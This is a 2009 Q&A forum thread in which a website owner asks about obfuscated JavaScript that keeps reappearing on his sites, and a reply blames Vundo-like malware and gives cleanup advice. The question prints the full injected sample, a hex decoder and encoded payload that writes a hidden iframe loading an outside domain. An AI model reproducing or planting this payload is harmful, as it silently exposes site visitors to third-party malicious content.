Javascript "virus"

Jakub Arnold picture Jakub Arnold · Apr 6, 2009 · Viewed 10.6k times · Source

I have a problem with some JS "virus" on all of my websites. They're on different hosts, and this code appears on some of them.

<script>
// Hex helper from the injected sample: parses a string of hexadecimal digits
// into its integer value. The decoder that follows passes it two-character
// slices of the payload. Local names are made readable here; the function
// name is kept exactly as captured so the sample can still be searched for.
function c2670903e0i49d9f1a845f6b(hexDigits) {
    var HEX_RADIX = 16;
    var parsed = parseInt(hexDigits, HEX_RADIX);
    return parsed;
}
// Hex-to-text decoder of the injected sample (left byte-identical as captured).
// Takes a string of hexadecimal digits, walks it two characters at a time,
// converts each pair to a number with the helper above and appends the
// corresponding character. Returns the decoded string.
function i49d9f1a8472f3(i49d9f1a8476d9) {
    var i49d9f1a848679 = 2;   // step: two hex digits per output character
    var i49d9f1a847da9 = '';  // accumulator for the decoded text
    // Alias for String.fromCharCode. Assigned without `var`, so in non-strict
    // code this becomes a global variable on the page.
    i49d9f1a848e47 = String.fromCharCode;
    // The loop counter is also undeclared and therefore a second implicit global.
    for (i49d9f1a84828e = 0; i49d9f1a84828e < i49d9f1a8476d9.length; i49d9f1a84828e += i49d9f1a848679) {
        // substr(offset, 2) -> parse as hex -> character -> append
        i49d9f1a847da9 += (i49d9f1a848e47(c2670903e0i49d9f1a845f6b(i49d9f1a8476d9.substr(i49d9f1a84828e, i49d9f1a848679))));
    }
    return i49d9f1a847da9;
}
// r1a is an empty string. It is spliced into the payload literal below after
// many of the '7' digits, so the hex text never appears contiguously in the
// page source; concatenation removes it again at run time.
// NOTE(review): presumably this is meant to defeat simple signature matching.
var r1a = '';
// Hex-encoded payload. Decoded by hand from this literal (confirm in an
// isolated analysis environment, not in a normal browser session):
//   layer 1 (hex)  -> a <script> element that, unless a flag named `myia` is
//                     already set, calls document.write(unescape('...')) and
//                     then sets `var myia=true`;
//   layer 2 (%xx)  -> an <iframe name=c26 ...> with width=521 height=484 and
//                     style='visibility:hidden', whose src points at
//                     ecom.rarebreedfootwear[.]com (defanged here).
// Net effect: the visitor's browser silently loads third-party content in an
// invisible frame.
var i49d9f1a84922e = '3C7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a +'43E696628216D7' + r1a + '96961297' + r1a + 'B646F637' + r1a + '56D656E7' + r1a + '42E7' + r1a + '7' + r1a + '7' + r1a + '2697' + r1a + '465287' + r1a + '56E657' + r1a + '363617' + r1a + '065282027' + r1a + '2533632536392536362537' + r1a + '322536312536642536352532302536652536312536642536352533642536332533322533362532302537' + r1a + '332537' + r1a + '32253633253364253237' + r1a + '2536382537' + r1a + '342537' + r1a + '342537' + r1a + '302533612532662532662536352536332536662536642532652537' + r1a + '322536312537' + r1a + '322536352536322537' + r1a + '322536352536352536342536362536662536662537' + r1a + '342537' + r1a + '37' + r1a + '2536352536312537' + r1a + '32253265253633253666253664253266253366253237' + r1a + '2532622534642536312537' + r1a + '342536382532652537' + r1a + '322536662537' + r1a + '352536652536342532382534642536312537' + r1a + '342536382532652537' + r1a + '32253631253665253634253666253664253238253239253261253332253335253332253331253336253334253239253262253237' + r1a + '253632253237' + r1a + '2532302537' + r1a + '37' + r1a + '2536392536342537' + r1a + '34253638253364253335253332253331253230253638253635253639253637' + r1a + '2536382537' + r1a + '342533642533342533382533342532302537' + r1a + '332537' + r1a + '342537' + r1a + '39253663253635253364253237' + r1a + '2537' + r1a + '362536392537' + r1a + '332536392536322536392536632536392537' + r1a + '342537' + r1a + '39253361253638253639253634253634253635253665253237' + r1a + '2533652533632532662536392536362537' + r1a + '3225363125366425363525336527' + r1a + '29293B7' + r1a + 'D7' + r1a + '6617' + r1a + '2206D7' + r1a + '969613D7' + r1a + '47' + r1a + '27' + r1a + '5653B3C2F7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a + '43E';
// Decodes the payload and writes the resulting markup straight into the
// document while it is being parsed, so the decoded <script> runs immediately.
document.write(i49d9f1a8472f3(i49d9f1a84922e));
</script>

NOD32 blocks the website because it believes there is a virus. Deleting the code from the source files doesn't help, because it reappears. It can't be the result of XSS, because it appears even on static websites.

I've tried running a full scan of my system and it didn't help. The only thing that is on all of the websites is Google Analytics, which I don't think could cause this.

edit: You can see it for example at http://www.postuj.cz/test/ or at http://flavicius.php5.cz/.

Answer

drarc picture drarc · Apr 6, 2009

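It looks like Vundo or a variant of it. That piece of malware has a tendency to insert seemingly meaningless JavaScript into sites (on your end, not the server-side). I'd suggest trying Malwarebytes' Anti-Malware. Install it, update it, and do a full scan. If that fails, perhaps try researching options for removing Vundo specifically. Note that if the script is actually present in the files stored on the servers (the question says it reappears after being deleted from the sources), cleaning the workstation alone will not remove it: after the machine is clean, change the FTP/hosting passwords from a known-clean system and re-upload clean copies of the files.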